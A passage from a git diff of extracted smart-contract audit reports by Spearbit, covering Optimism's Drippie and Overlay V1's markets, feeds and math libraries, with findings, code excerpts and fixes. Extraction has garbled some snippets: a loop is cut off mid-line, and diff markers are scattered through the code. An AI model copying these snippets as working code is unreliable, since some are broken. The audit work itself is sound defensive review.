other- wise. Without reading the code, a user/developer would expect that the function returns true if all the checks passes otherwise false but in reality the function will always return true or revert. Because of this behavior, a reverting drip that do not pass the requirements inside executable will never revert with the message present in the following code executed by the drip function require( executable(_name) == true, "Drippie: drip cannot be executed at this time, try again later" ); Recommendation: If the current implementation is the expected behavior, consider updating the natspec of the function to reflect the function’s implementation. Optimism: The recommendation has been implemented in the PR#3280. Spearbit: Fixed. 19 +5.4.9 Drippie Use Case Notes Severity: Informational Description: Drippie intends to support use cases outside of the initial hot EOA top-up use case demonstrated by Optimism. To further clarify, we’ve noted that drips support: • Sending eth • External function calls with fixed params • Preconditions Examples include, conditionally transferring eth or tokens. Calling an admin function iff preconditions are met. Drips do not support: • Updating the drip contract storage • Altering params • Postconditions Examples include, vesting contracts or executing Uniswap swaps based on recent moving averages (which are not without their own risks). Where dynamic params or internal accounting is needed, a separate contract needs to be paired with the drip. Recommendation: No changes needed. Documenting only. +5.4.10 Augment Documentation for dripcheck.check Indicating Precondition Check Only Performed Severity: Informational Context: Drippie.sol#L252-L302 Description: Before executing the whole batch of actions the drip function call executable that check if the drip can be executed. Inside executable an external contract is called by this instruction require( state.config.dripcheck.check(state.config.checkparams), "Drippie: dripcheck failed so drip is not yet ready to be triggered" ); Optimism provided some examples like checking if a target balance is below a specific threshold or above that threshold, but in general, the dripcheck.check invocation could perform any kind of checks. The important part that should be clear in the natspec documentation of the drip function is that that specific check is performed only once before the execution of the bulk of actions. Recommendation: Consider updating the natspec documentation of the drip function, making explicit that the check done by dripcheck.checkis performed only before executing the batch of actions. Optimism: The recommendation has been implemented in the PR#3280. Spearbit: Fixed. 20 +5.4.11 Considerations on the drip state.last and state.config.interval values Severity: Informational Context: Drippie.sol#L227-L230 Description: When the drip function is called by an external actor, the executable is executed to check if the drip meets all the needed requirements to be executed. The only check that is done regarding the drip state.last and state.config.interval is this require( state.last + state.config.interval <= block.timestamp, "Drippie: drip interval has not elapsed since last drip" ); The state.time is never really initialized when the create function is called, this means that it will be automatically initialized with the default value of the uint256 type: 0. • Consideration 1: Drips could be executed as soon as created Depending on the value set to state.config.interval the executable’s logic implies that as soon as a drip is created, the drip can be immediately (even in the same transaction) executed via the drip function. • Consideration 2: A very high value for interval could make the drip never executable block.timestamp represents the number of seconds that passed since Unix Time (1970-01-01T00:00:00Z). When the owner of the Drippie want to create a "one shot" drip that can be executed immediately after creation but only once (even if the owner forgets to set the drip’s status to ARCHIVED) he/she should be aware that the max value that he/she can use for the interval is at max block.timestamp. This mean that the second time the drip can be executed is after block.timestamp seconds have been passed. If, for example, the owner create right now a drip with interval = block.timestamp it means that after the first execution the same drip could be executed after ~52 years (~2022-1970). Recommendation: At minimum, include documentation to highlight that drips could be immediately callable after creation, depending on the interval value. Consider the mentioned limitation of the interval max value if you want to have "one shot" actions that can be triggered as soon as created. Consider adding an additional mechanism to manage the scenario where a drip should be executed only after a specific timestamp is passed. +5.4.12 Support ERC1155 in AssetReceiver Severity: Informational Context: AssetReceiver.sol#L128 Description: AssetReceiver support ERC20 and ERC721 interfaces but not ERC1155. Recommendation: For generalized use cases, considering adding support for ERC1155. 21 +5.4.13 Reorder DripStatus Enum for Clarity Severity: Informational Context: Drippie.sol#L30-L31 Description: The current implementation of Drippie contract has the following enum type: enum DripStatus { NONE, // uint8(0) ACTIVE, PAUSED, ARCHIVED } When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)) and when it gets activated its status is changed to ACTIVE (equal to uint8(1)) So, the status change from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Switching the order inside the enum DripStatus definition between PAUSED and ACTIVE would make it more clean and easier to understand. Recommendation: Consider switching the order inside the enum DripStatus definition between PAUSED and ACTIVE would make it more clean and easier to understand. Optimism: The recommendation has been implemented in the PR#3280. Spearbit: Fixed. +5.4.14 _gas is Unneeded as Transactor.CALL and Transactor.DELEGATECALL Function Argument Severity: Informational Context: Transactor.sol#L30, Transactor.sol#L49 Description: The caller (i.e. contract owner) can control desired amount of gas at the transaction level. Recommendation: Remove the _gas argument. Optimism: Addressed in PR#3280. Spearbit: Fixed. +5.4.15 Licensing Conflict on Inherited Dependencies Severity: Informational Context: Drippie.sol#L1, AssetReceiver.sol#L1, Transactor.sol#L1 Description: Solmate contracts are AGPL Licensed which is incompatible with the MIT License of Drippie related contracts. Recommendation: Strict interpretations of AGPL require inheriting contracts to be released under AGPL. Possible remediations include: • Altering Drippie license • Removing AGPL dependencies, using alternate library Optimism: Spearbit v7 is now MIT licensed. Spearbit: Solmate v7 license have been updated to MIT. Note: The project has been audited with Solmate v6 (that has been audited) and not with Solmate v7 (which at the current time has not been audited). 22 +5.4.16 Rename Functions for Clarity Severity: Informational Context: Drippie.sol#L160 Description: status The status(string memory _name, DripStatus _status) function allows the owner to update the status of a drip. The purpose of the function, based on the name, is not obvious at first sight and could confuse a user into believing that it’s a view function to retrieve the status of a drip instead of mutating its status. executable The executable(string memory _name) public view returns (bool) function returns true if the drip with name _name can be executed. Recommendation: Consider changing status to setStatus/updateStatus. Consider changing executable to isExecutable. +5.4.17 Owner Has Permission to Drain Value from Drippie Contract Severity: Informational Context: Scenario 1: Drippie.sol#L126 Scenario 2: Drippie.sol#L19 Scenario 3: Transactor.sol#L27-L34 Description: Consider the following scenarios. • Scenario 1 Owner may create arbitrary drips, including a drip to send all funds to themselves. • Scenario 2 AssetReceiver permits owner to withdraw ETH, ERC20 tokens, and ERC721 tokens. • Scenario 3 Owner may execute arbitrary calls. Transactor.CALL function is a function that allows the owner of the contract to execute a "general purpose" low- level call. function CALL( address _target, bytes memory _data, uint256 _gas, uint256 _value ) external payable onlyOwner returns (bool, bytes memory) { return _target.call{ gas: _gas, value: _value }(_data); } The function will transfer _value ETH present in the contract balance to the _target address. The function is also payable and this mean that the owner can send along with the call some funds. Test example showcasing the issue: 23 function test_transactorCALLAllowOwnerToDrainDrippieContract() public { bool success; vm.deal(deployer, 0 ether); vm.deal(bob, 0 ether); vm.deal(address(drippie), 1 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them (success, ) = drippie.CALL{value: 0 ether}(bob, "", 100000, 1 ether); assertEq(success, true); assertEq(address(drippie).balance, 0 ether); assertEq(bob.balance, 1 ether); } Recommendation: These permissions appear intentional. Be sure to document for Drippie users and suggest they take any necessary precautions (multisigs, etc.). Consider whether arbitrary calls are necessary and, if not, remove AssetReceiver (and inherit directly from Owned). Arbitrary calls can already be made by the owner creating a new drip, think of arbitrary calls as "one shot drips". Setting a very large interval makes it easy to archive a one shot drip after use. What would be lost by removing AssetReceiver as a dependency is arbitrary state updates, from the delegate- call, and the onERC721Received we recommended adding to AssetReceiver in another ticket. 24 diff --git a/findings_newupdate/spearbit/Overlay-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Overlay-Spearbit-Security-Review.txt new file mode 100644 index 0000000..d342f42 --- /dev/null +++ b/findings_newupdate/spearbit/Overlay-Spearbit-Security-Review.txt @@ -0,0 +1,31 @@ +5.1.1 Use unchecked in TickMath.sol and FullMath.sol Severity: High Risk Context: Overlay TickMath, Euler TickMath, Overlay FullMath, Euler FullMath Description: Uniswap math libraries rely on wrapping behaviour for conducting arithmetic operations. Solidity version 0.8.0 introduced checked arithmetic by default where operations that cause an overflow would revert. Since the code was adapted from Uniswap and written in Solidity version 0.7.6, these arithmetic operations should be wrapped in an unchecked block. Recommendation: Add an unchecked block to the following functions in TickMath.sol and FullMath.sol: • getSqrtRatioAtTick() • getTickAtSqrtRatio() • mulDiv() • mulDivRoundingUp() The Uniswap protocol has a reference implementation for these changes in a branch named 0.8. Overlay: Fixed in commit 1f6a974. Spearbit: Acknowledged. +5.1.2 Liquidation might fail Severity: High Risk Context: OverlayV1Market.sol#L345-L376, Position.sol#L221-L247 Description: The liquidate() function checks if a position can be liquidated and via liquidatable(), uses maintenanceMarginFraction as a factor to determine if enough value is left. However, in the rest of the liqui- date() function liquidationFeeRate is used to determine the fee paid to the liquidator. It is not necessarily true that enough value is left for the fee, as two different ways are used to calculate this which means that positions might be liquidated. This is classified as high risk because liquidation is an essential functionality of Overlay. contract OverlayV1Market is IOverlayV1Market { function liquidate(address owner, uint256 positionId) external { ... require(pos.liquidatable(..., maintenanceMarginFraction),"OVLV1:!liquidatable"); ... uint256 liquidationFee = value.mulDown(liquidationFeeRate); ... ovl.transfer(msg.sender, value - liquidationFee); ovl.transfer(IOverlayV1Factory(factory).feeRecipient(), liquidationFee); } } library Position { function liquidatable(..., uint256 maintenanceMarginFraction) ... { ... uint256 maintenanceMargin = posNotionalInitial.mulUp(maintenanceMarginFraction); can_ = val < maintenanceMargin; } } 4 Recommendation: Also take into account liquidationFee to determine if a position can/should be liquidated. Note: function build() also calls liquidatable(). Overlay: Agreed. The way the liquidation fee amount is calculated, it’s taken from the remaining maintenance margin once the liquidate() function is called (less any burn of margin as insurance). So the liquidation fee in its current form is not as a percentage of the current notionalWithPnl() like trading fees are, which means that it won’t affect the ability to liquidate the position. We should potentially change this. Fixed in commit 082c6c7. Spearbit: Acknowledged. 5.2 Medium Risk +5.2.1 Rounding down of snapAccumulator might influence calculations Severity: Medium Risk Context: Roller.sol#L23-L78 Description: The function transform() lowers snapAccumulator with the following equation: (snapAccumulator * int256(dt)) / int256(snapWindow). During the time that snapAccumulator * dt is smaller than snapWindow this will be rounded down to 0, which means snapAccumulator will stay at the same value. Luckily, dt will eventually reach the value of snapWindow and by then the value won’t be rounded down to 0 any more. Risk lies in calculations diverging from formulas written in the whitepaper. Note: Given medium risk severity because the probability of this happening is high, while impact is likely low. function transform(...) ... { ... snapAccumulator -= (snapAccumulator * int256(dt)) / int256(snapWindow); ... } Recommendation: Confirm that rounding down does not influence calculations too much. Overlay: Confirmed and agreed. Fixed in commit 9b1865e. Spearbit: Acknowledged. +5.2.2 Verify pool legitimacy Severity: Medium Risk Context: OverlayV1UniswapV3Factory.sol#L19-L40, OverlayV1UniswapV3Feed.sol#L30-L78 Description: The constructor in OverlayV1UniswapV3Factory.sol and OverlayV1UniswapV3Feed.sol only does a partial check to see if the pool corresponds to the supplied tokens. This is accomplished by calling the pool’s functions but if the pool were to be malicious, it could return any token. Additionally, checks can be by- passed by supplying the same tokens twice. Because the deployFeed() function is permissionless, it is possible to deploy malicious feeds. Luckily, the de- ployMarket() function is permissioned and prevents malicious markets from being deployed. contract OverlayV1UniswapV3Factory is IOverlayV1UniswapV3FeedFactory, OverlayV1FeedFactory { constructor(address _ovlWethPool, address _ovl, ...) { ovlWethPool = _ovlWethPool; // no check on validity of _ovlWethPool here ovl = _ovl; } function deployFeed(address marketPool, address marketBaseToken, address marketQuoteToken, ...) external returns (address feed_) { // Permissionless ... // no check on validity of marketPool here } 5 } contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { constructor( address _marketPool, address _ovlWethPool, address _ovl, address _marketBaseToken, address _marketQuoteToken, ... ) ... { ... address _marketToken0 = IUniswapV3Pool(_marketPool).token0(); // relies on a valid _marketPool address _marketToken1 = IUniswapV3Pool(_marketPool).token1(); require(_marketToken0 == WETH || _marketToken1 == WETH, "OVLV1Feed: marketToken != WETH"); marketToken0 = _marketToken0; marketToken1 = _marketToken1; require( _marketToken0 == _marketBaseToken || _marketToken1 == _marketBaseToken, "OVLV1Feed: marketToken != marketBaseToken" ); require( _marketToken0 == _marketQuoteToken || _marketToken1 == _marketQuoteToken, "OVLV1Feed: marketToken != marketQuoteToken" ); marketBaseToken = _marketBaseToken; // what if _marketBaseToken == _marketQuoteToken == WETH ? marketQuoteToken = _marketQuoteToken; marketBaseAmount = _marketBaseAmount; // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); // relies on a valid ,! _ovlWethPool address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); require( _ovlWethToken0 == WETH || _ovlWethToken1 == WETH, "OVLV1Feed: ovlWethToken != WETH" ); require( _ovlWethToken0 == _ovl || _ovlWethToken1 == _ovl, // What if _ovl == WETH ? "OVLV1Feed: ovlWethToken != OVL" ); ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; marketPool = _marketPool; ovlWethPool = _ovlWethPool; ovl = _ovl; } Recommendation: Verify that pools are indeed Uniswap pools and the supplied tokens do generate the supplied pool. Note: Verifying that a legitimate Uniswap pool is used still allows for the possibility of malicious tokens making it into the pool. Consider changing the deployFeed() function to be permissioned the same way deployMarket() also is. When deploying a market via deployMarket() make sure only valid feeds and tokens are used. Consider checking the pools using the example code below, note that: 6 • This can be done for both the marketPool and the _ovlWethPool • Determine where to do this, in OverlayV1UniswapV3Factory and/or OverlayV1UniswapV3Feed • This way the pool address doesn’t even have to be supplied. • You have to supply a fee to getPool(). It seems only 3 fees used. IUniswapV3Factory constant UniswapV3Factory = IUniswapV3Factory(address(0x1F98431c8aD98523631AE4a59f267346ea31F984)); ,! uint24[3] memory FeeAmount=[uint24(500),uint24(3000),uint24(10000)]; for (uint i=0;i 2**32). function transform(... , uint256 timestamp, ...) ... { uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 ... uint256 dt = uint256(timestamp32 - self.timestamp); // could revert if timestamp32 has just wrapped ... } Recommendation: Note that this truncation would only occur in year 2107, and most protocols ignore this issue. However, a potential fix would look like as follows: uint256 dt; if (timestamp32 < self.timestamp) { dt = uint256(2**32) + uint256(timestamp32) - uint256(self.timestamp); else dt = uint256(timestamp32 - self.timestamp); } Overlay: Fixed in 7fe8ff3. Spearbit: Acknowledged. 8 +5.3.4 Verify the validity of _microWindow and _macroWindow Severity: Low Risk Context: OverlayV1Feed.sol#L13-L16 Description: The constructor of OverlayV1Feed doesn’t verify the validity of _microWindow and _macroWindow, potentially causing the price oracle to produce bad results if misconfigured. constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; } Recommendation: Consider adding sanity checks to be safe. Note: Doing checks in constructors are a one time thing, thereofre gas overhead is often acceptable. Consider introducing the following checks: 1. microWindow > 0 2. macroWindow > microWindow 3. macroWindow / microWindow > constant some bound. From test cases, this is 60. 4. macroWindow < 1 day or a similar bound. Overlay: Fixed in commit 44b419c. Except for the 3rd recommendation. Spearbit: Acknowledged. +5.3.5 Simplify _midFromFeed() Severity: Low Risk Context: OverlayV1Market.sol#L653-L657 Description: The calculation in _midFromFeed() is more complicated than necessary because: min(x,y) + max(x,y) == x + y. More importantly, the average operation (bid + ask) / 2 can overflow and revert if bid + ask >= 2**256. function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) { uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow); uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow); mid_ = (bid + ask) / 2; } Recommendation: Change the code as follows: function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) { uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow); - uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow); - mid_ = (bid + ask) / 2; - + mid_ = Math.average(data.priceOverMicroWindow, data.priceOverMacroWindow); } Here, the average function is from Openzepplin. Overlay: Fixed in commit 2bb5654. Spearbit: Acknowledged. 9 5.4 Gas Optimization +5.4.1 Use implicit truncation of timestamp Severity: Gas Optimization Context: Roller.sol#L29 Description: Solidity will truncate data when it is typecast to a smaller data type, see solidity explicit-conversions. This can be used to simplify the following statement: uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 Recommendation: Change the code as follows: - uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 + uint32 timestamp32 = uint32(timestamp); // truncated by compiler Overlay: Fixed in commit 08ef243. Spearbit: Acknowledged. +5.4.2 Set pos.entryPrice to 0 after liquidation Severity: Gas Optimization Context: OverlayV1Market.sol#L345-L427 Description: The liquidate() function sets most of the values of pos to 0, with the exception of pos.entryPrice. function liquidate(address owner, uint256 positionId) external { ... // store the updated position info data. mark as liquidated pos.notional = 0; pos.debt = 0; pos.oiShares = 0; pos.liquidated = true; positions.set(owner, positionId, pos); ... } Recommendation: Consider setting pos.entryPrice to 0. This is more in line with the rest of the code and can give a small gas refund. Overlay: Fixed in commit 55318f5. Spearbit: Acknowledged. +5.4.3 Store result of expression in temporary variable Severity: Gas Optimization Context: OverlayV1Market.sol#L145-L221, OverlayV1Market.sol#L240-L342, OverlayV1Market.sol#L488-L534 Description: Several gas optimizations are possible by storing the result of an expression in a temporary variable, such as the value of oiFromNotional(data, capNotionalAdjusted). 10 function build( ... ) { ... uint256 price = isLong ? ask(data, _registerVolumeAsk(data, oi, oiFromNotional(data, capNotionalAdjusted))) : bid(data, _registerVolumeBid(data, oi, oiFromNotional(data, capNotionalAdjusted))); ... require(oiTotalOnSide <= oiFromNotional(data, capNotionalAdjusted), "OVLV1:oi>cap"); } • A: The value of pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) could be stored in a temporary variable to save gas. • B: The value of oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) could also be stored in a temporary variable to save gas and make the code more readable. • C: The value of pos.oiSharesCurrent(fraction) could be stored in a temporary variable to save gas. function unwind(...) ... { ... uint256 price = pos.isLong ? bid( data, _registerVolumeBid( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A1 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B1 ) ) : ask( data, _registerVolumeAsk( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A2 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B2 ) ); ... if (pos.isLong) { oiLong -= Math.min( oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A3 ); oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); // C1 } else { oiShort -= Math.min( oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A4 ); oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); // C2 } ... pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); // C3 } The value of 2 * k * timeElapsed could also be stored in a temporary variable: 11 function oiAfterFunding( ...) ... { ... if (2 * k * timeElapsed < MAX_NATURAL_EXPONENT) { fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); } Recommendation: Consider using temporary variables to save gas and improve readability. Overlay: Fixed in commit 0af31ff for oiFromNotional() i.e., B. The recommendations A and C are causing some stack too deep issues so haven’t implemented yet. Spearbit: Acknowledged. +5.4.4 Flatten code of OverlayV1UniswapV3Feed Severity: Gas Optimization Context: OverlayV1UniswapV3Feed.sol#L84-L282 Description: Functions _fetch(), _inputsToConsultMarketPool(), _inputsToConsultOvlWethPool() and con- sult() do a lot of interactions with small arrays and loops over them, increasing overhead and reading difficulty. Recommendation: Consider making the code less generic and unroll it. Note: If you don’t unroll, for loops of arrays can be made more efficient by caching the array length. However as the loops are very small maybe its not worth the trouble. Overlay: The overlay team is also working on potentially flattening this in the Balancer feed implementation. The function _fetch was flattened in the commit bce944f. Spearbit: Acknowledged. +5.4.5 Replace memory with calldata Severity: Gas Optimization Context: OverlayV1Deployer.sol#L21-L25, OverlayV1Market.sol#L102-L107 Description: External calls to functions with memory parameters can be made more gas efficient by replacing memory with calldata, as long as the memory parameters are not modified. Recommendation: Consider replacing memory with calldata and check the gas costs are indeed lower. Note: Also check with finding "Put risk parameters in an array". contract OverlayV1Deployer is IOverlayV1Deployer { - + function deploy(..., Risk.Params memory params) .. { function deploy(..., Risk.Params calldata params) .. { Overlay: Fixed in commit 6e96fa5. Spearbit: Acknowledged. 12 +5.4.6 No need to cache immutable values Severity: Gas Optimization Context: OverlayV1UniswapV3Feed.sol#L84-L87, OverlayV1Feed.sol#L13-L16 Description: Variables microWindow and macroWindow are immutable, so it is not necessary to cache them because the compiler inlines their value. contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { function _fetch() internal view virtual override returns (Oracle.Data memory) { // cache micro and macro windows for gas savings uint256 _microWindow = microWindow; uint256 _macroWindow = macroWindow; ... } } abstract contract OverlayV1Feed is IOverlayV1Feed { ... uint256 public immutable microWindow; uint256 public immutable macroWindow; ... constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; } } Recommendation: Use microWindow and macroWindow directly in function _fetch(). Overlay: Fixed in commit ef5d0d3. Spearbit: Acknowledged. +5.4.7 Simplify circuitBreaker Severity: Gas Optimization Context: OverlayV1Market.sol#L558-L574 Description: The function circuitBreaker() does a divDown() which can be circumvented to save gas and improving readability. function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) { return 0; } ... } Recommendation: Consider changing the circuitBreaker() function as follows: 13 function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) { } else if (minted >= 2 * int256(_circuitBreakerMintTarget)) { // more like the 'if' above return 0; } ... - + } Overlay: Had added the divDown in the else clause to match the following, in the event of a rounding issue that caused adjustment to be negative. uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget); But seeing here now that divDown (vs divUp) would always have adjustment >= 0. So confirmed and agree. Fixed in commit 3ce32d9. Spearbit: Acknowledged. +5.4.8 Optimizations if data.macroWindow is constant Severity: Gas Optimization Context: OverlayV1Market.sol#L578-L606, OverlayV1Market.sol#L465-L484 Description: Several checks are done in contract OverlayV1Market which involve data.macroWindow in combi- nation with a linear calculation. If data.macroWindow does not change (as is the case with the UniswapV3 feed), it is possible to optimize the calculations by precalculating several values. Recommendation: In the constructor of contract OverlayV1Market.sol calculate the following (please double check the calculations): frontbackrunbound = Math.min( params.lmbda, params.delta * data.macroWindow * 2 / AVERAGE_BLOCK_TIME); Also update frontbackrunbound when lmbda or delta are changed. And then update capNotionalAdjustedForBounds() to: function capNotionalAdjustedForBounds(Oracle.Data memory data, uint256 cap) public view returns ,! - - + (uint256) { ... cap = Math.min(cap, frontRunBound(data)); ... cap = Math.min(cap, backRunBound(data)); cap = Math.min(cap, frontbackrunbound * data.reserveOverMicroWindow ); ... return lmbda.mulDown(data.reserveOverMicroWindow); } -function frontRunBound(Oracle.Data memory data) public view returns (uint256) { - -} -function backRunBound(Oracle.Data memory data) public view returns (uint256) { - - -} uint256 window = (data.macroWindow * ONE) / AVERAGE_BLOCK_TIME; return delta.mulDown(data.reserveOverMicroWindow).mulDown(window).mulDown(2 * ONE); In the constructor of contract OverlayV1Market.sol calculate the following: 14 uint256 pow = params.priceDriftUpperLimit * data.macroWindow; dpLowerLimit = INVERSE_EULER.powUp(pow); dpUpperLimit = EULER.powUp(pow); Also update dpLowerLimit and dpUpperLimit when priceDriftUpperLimit is changed. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 pow = priceDriftUpperLimit * data.macroWindow; uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); ... return (dp >= dpLowerLimit && dp <= dpUpperLimit); - - - } Note: Also see finding "Optimize power functions" for additional optimizations. Overlay: Implemented the caching optimization for dpUpperLimit in the commit c505175, but decided against caching frontbackrunbound since I think it’s a bit easier to read the code with the whitepaper when frontRun- Bound() and backRunBound() remain separate functions. Spearbit: Acknowledged. +5.4.9 Remove unused / redundant functions and variables Severity: Gas Optimization OverlayV1Market.sol#L536-L539, Context: Position.sol#L251-L292, OverlayV1UniswapV3Feed.sol#L30-L78 OverlayV1Market.sol#L642-L649, Position.sol#L79-L90, Description: Functions nextPositionId() and mid() in OverlayV1Market.sol are not used internally and don’t appear to be useful. contract OverlayV1Market is IOverlayV1Market { function nextPositionId() external view returns (uint256) { return _totalPositions; } function mid(Oracle.Data memory data,uint256 volumeBid,uint256 volumeAsk) ... { ... } } The functions oiInitial() and oiSharesCurrent() in library Position.sol have the same implementation. The oiInitial() function does not seem useful as it retrieves current positions and not initial ones. library Position { /// @notice Computes the initial open interest of position when built ... function oiInitial(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } /// @notice Computes the current shares of open interest position holds ... function oiSharesCurrent(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } } 15 The function liquidationPrice() in library Position.sol is not used from the contracts. Because it type is internal it cannot be called from the outside either. library Position { function liquidationPrice(... ) internal pure returns (uint256 liqPrice_) { ... } } The variables ovlWethToken0 and ovlWethToken1 are stored but not used anymore. constructor(..., address _ovlWethPool,...) .. { ... // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); ... ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; ... } Recommendation: Doublecheck the usefulness of the abovementioned functions and variables. Remove them if not useful or change them to become useful. Overlay: • nextPositionId() was for testing. • mid() has been replaced with _midFromFeed(). • oiInitial() this is likely confusing. • ovlWethToken0 and ovlWethToken1: unnecessary since the feed contract stores and uses ovl and WETH. Removed mid(), nextPositionId() and liquidationPrice() in this commit. We will update ovlWethToken0 and ovlWethToken1 when addressing Check pools and Flatten code of OverlayV1UniswapV3Feed. Spearbit: Acknowledged. +5.4.10 Optimize power functions Severity: Gas Optimization Context: OverlayV1Market.sol#L465-L469, OverlayV1Market.sol#L504-L506, OverlayV1Market.sol#L621-L640 Description: In contract OverlayV1Market.sol, several power calculations are done with EULER / INVERSE_EULER as a base which can be optimized to save gas. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); ... } Note: As the Overlay team confirmed, less precision might be sufficient for this calculation. OverlayV1Market.sol: fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); OverlayV1Market.sol: bid_ = bid_.mulDown(INVERSE_EULER.powUp(pow)); OverlayV1Market.sol: ask_ = ask_.mulUp(EULER.powUp(pow)); 16 Recommendation: Replace EULER.powUp(x) with x.expUp() and replace INVERSE_EULER.powDown(x) with In function dataIsValid() an even further optimization is possible, as (1/e)ˆx == ONE.divDown(x.expUp());. exp(-x) == 1/exp(x). Consider using alternative exp() functions if less precision is required. Note: Although this might not be worth the trouble, take into account the suggestions of finding: Optimizations if data.macroWindow is constant. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); uint256 dpUpperLimit = pow.expUp(); uint256 dpLowerLimit = ONE.divDown(dpUpperLimit); ... - - + + } This requires access to the LogExpMath.exp() function. As this function is private, something like the following needs to be added to library FixedPoint.sol (please double check the code): library FixedPoint { function expUp(uint256 x) internal pure returns (uint256) { if (x == 0) return ONE; _require(x < 2**255, Errors.X_OUT_OF_BOUNDS); int256 x_int256 = int256(x); uint256 raw = uint256(LogExpMath.exp(x_int256)); uint256 maxError = add(mulUp(raw, MAX_POW_RELATIVE_ERROR), 1); return add(raw, maxError); } Note: The constants EULER and INVERSE_EULER could be rewritten in a more readable format, but they are no longer necessary with the above suggested changes. OverlayV1Market.sol: -uint256 internal constant EULER = 2718281828459045091; +uint256 internal constant EULER = 2.718_281_828_459_045_091e18; -uint256 internal constant INVERSE_EULER = 367879441171442334; +uint256 internal constant INVERSE_EULER = 0.367_879_441_171_442_334e18; Overlay: Fixed in commit 4b20c00f. Spearbit: Acknowledged. +5.4.11 Redundant Math.min() Severity: Gas Optimization Context: OverlayV1Market.sol#L543-L574 Description: The function capNotionalAdjustedForCircuitBreaker() calculates circuitBreaker() and then does a Math.min(cap,...) with the result. However circuitBreaker() already returns a value that is <= cap. So the Math.min(...) function is unnecesary. 17 function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) { ... cap = Math.min(cap, circuitBreaker(snapshot, cap)); return cap; } function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) public view returns (uint256) { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (...) { return 0; } // so minted > _circuitBreakerMintTarget, thus minted / _circuitBreakerMintTarget > ONE ... uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget); // so adjustment <= ONE return cap.mulDown(adjustment); // so this is <= cap } Recommendation: Change capNotionalAdjustedForCircuitBreaker() as follows: function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) { ... cap = Math.min(cap, circuitBreaker(snapshot, cap)); cap = circuitBreaker(snapshot, cap); - + } Overlay: Fixed in commit 3fe9520. Spearbit: Acknowledged. +5.4.12 Replace square with multiplication Severity: Gas Optimization Context: OverlayV1Market.sol#L515-L518 Description: The contract OverlayV1Market.sol contains the following expression several times: x.powDown(2 * ONE). This computes the square of x. However, it can also be calculated in a more gas efficient way: function oiAfterFunding(...) { ... uint256 underRoot = ONE - oiImbalanceBefore.divDown(oiTotalBefore).powDown(2 * ONE).mulDown( ONE - fundingFactor.powDown(2 * ONE) ); ... } Recommendation: Replace x.powDown(2 * ONE) with mulDown(x,x). Alternatively add this functionality into the FixedPoint.sol library like balancer has done: Balancer FixedPoint.sol#L107-L117 Overlay: Fixed in commit ad4395d. Spearbit: Acknowledged. 18 +5.4.13 Retrieve roles via constants in import Severity: Gas Optimization Context: OverlayV1Token.sol#L10-L21, 